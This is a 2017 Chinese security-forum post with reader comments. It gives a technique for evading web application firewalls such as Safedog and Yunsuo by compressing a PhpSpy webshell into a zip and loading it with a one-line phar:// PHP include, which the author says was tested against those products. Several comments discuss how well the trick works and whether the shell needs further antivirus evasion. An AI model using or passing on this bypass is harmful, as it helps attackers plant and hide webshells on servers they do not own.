利用phar://协议绕过waf检测拦截

2017-04-09 16:48:29 65 jzking121 7405 3

phar:// 数据流包装器自 PHP 5.3.0 起开始有效。
利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测。
现在一些waf会检测文件的内容，我们可以通过包含的方式，包含zip后缀或者phar后缀里面的文件达到绕过防护的目的。

实测：PhpSpy 2010 过安全狗4.0 云锁拦截

php内容：

<?php

include 'phar://2010.zip/2010.php';

?>

2010.zip是我压缩大马后的文件。注意用zip压缩。文件后缀名可以是任何名字。

参考：
http://php.net/manual/zh/wrappers.phar.php

类别渗透测试

关于作者

jzking1218篇文章41篇回复

jzking121

评论65次

要评论？请先登录或注册

5楼

atta
2017-4-9 17:45

蛮好的思路

回复|@ta|踩(0)|顶(0)
4楼

但丁2015
2017-4-9 17:42

确实是个好姿势，但是现在软waf已经可以对包内文件做检测了。

回复|@ta|踩(0)|顶(0)
3楼

Skullsb
2017-4-9 17:15

读取后会自行解压出来对么

回复|@ta|踩(0)|顶(0)
2楼

Calm
2017-4-9 17:08

附一份更多利用方法： http://drops.blbana.cc/2016/12/03/e6-96-87-e4-bb-b6-e5-8c-85-e5-90-ab-e6-bc-8f-e6-b4-9e-ef-bc-88-e4-ba-8c-ef-bc-89/

回复|@ta|踩(0)|顶(0)
1楼

猴子请来的
2017-4-9 17:01

这是另一种包含格式咯？但是压缩包里面的马也要免杀吧，遇到360会不会被删？

回复|@ta|踩(0)|顶(0)